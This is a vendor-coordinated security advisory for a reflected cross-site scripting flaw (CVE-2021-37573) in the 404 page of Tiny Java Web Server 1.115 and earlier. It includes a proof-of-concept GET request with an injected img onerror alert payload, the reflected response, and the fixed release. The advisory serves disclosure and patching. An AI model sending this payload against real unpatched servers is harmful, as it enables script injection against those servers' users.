what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Tiny Java Web Server 1.115 Cross Site Scripting

Tiny Java Web Server 1.115 Cross Site Scripting
Posted Aug 14, 2021
Authored by Maurizio Ruchay | Site syss.de

Tiny Java Web Server and Servlet Container versions 1.115 and below suffer from a cross site scripting vulnerability.

tags | exploit, java, web, xss
advisories | CVE-2021-37573
SHA-256 | 32008168ce6c6acfd2f9997496c840696b8c89f0bb121038eadaf5c24045103a

Tiny Java Web Server 1.115 Cross Site Scripting

Change Mirror Download
Advisory ID:                SYSS-2021-042
Product: Tiny Java Web Server and Servlet Container
(TJWS)
Manufacturer: D. Rogatkin
Affected Versions: <= 1.115
Tested Versions: 1.107, 1.114
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2021-07-21
Solution Date: 2021-07-23
Public Disclosure: 2021-08-03
CVE Reference: CVE-2021-37573
Author of Advisory: Maurizio Ruchay, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Tiny Java Web Server and Servlet Container (TJWS) is a lightweight web
server written in Java.

The manufacturer describes the product as follows (see [1]):
"The Miniature Java Web Server is built as a servlet container with HTTPD
servlet providing standard Web server functionality."

Due to improper input validation, the application is vulnerable to a
reflected cross-site scripting attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It is possible to inject malicious JavaScript code into the server's error
page "404 Page Not Found".

The given input is not properly validated and therefore reflected back
and executed in a victim's browser.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following GET request shows how JavaScript code can be placed on
the page:

===
HTTP request:
GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1
[...]
Connection: close


HTTP response:
HTTP/1.1 404 te<img src=x onerror=alert(42)>st not found
server: D. Rogatkin's TJWS (+Android, JSR340, JSR356)
https://github.com/drogatkin/TJWS2.git/Version 1.114
[...]
content-length: 338
connection: close

<HTML><HEAD><TITLE>404 te<img src=x onerror=alert(42)>st not
found</TITLE></HEAD><BODY BGCOLOR="#D1E9FE">
[...]
<H2>404 te<img src=x onerror=alert(42)>st not found</H2>
[...]
===

If a browser renders the response, the JavaScript code is executed
showing the message "42".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The issue has been addressed in the release version 1.116.[2]
Therefore, all instances of TJWS should be updated to this version.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-02: Vulnerability discovered
2021-07-21: Vulnerability reported to manufacturer
2021-07-23: Patch released by manufacturer
2021-08-03: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Tiny Java Web Server and Servlet Container (TJWS):
http://tjws.sourceforge.net/
[2] Patch release on Github:
https://github.com/drogatkin/TJWS2/releases/tag/v1.116
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Maurizio Ruchay of SySS GmbH.

E-Mail: maurizio.ruchay@syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc
Key ID: 0xC7D20E267F0FA978
Key Fingerprint: D506 AB5A FE3E 09AE FFBE DEB2 C7D2 0E26 7F0F A978

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close